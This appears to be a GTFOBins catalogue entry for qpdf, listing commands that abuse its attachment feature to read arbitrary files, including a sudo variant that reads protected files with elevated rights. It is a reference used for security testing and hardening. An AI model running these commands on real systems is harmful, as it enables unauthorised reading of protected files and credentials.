GTFOBins.github.io/_gtfobins/qpdf.md
2024-04-12 12:33:45 -03:00

10 lines
283 B
Markdown

---
functions:
file-read:
- code: |
qpdf --empty --add-attachment /path/filename -- out.pdf; qpdf out.pdf --show-attachment=filename
sudo:
- code: |
sudo qpdf --empty --add-attachment /path/filename -- out.pdf; qpdf out.pdf --show-attachment=filename
---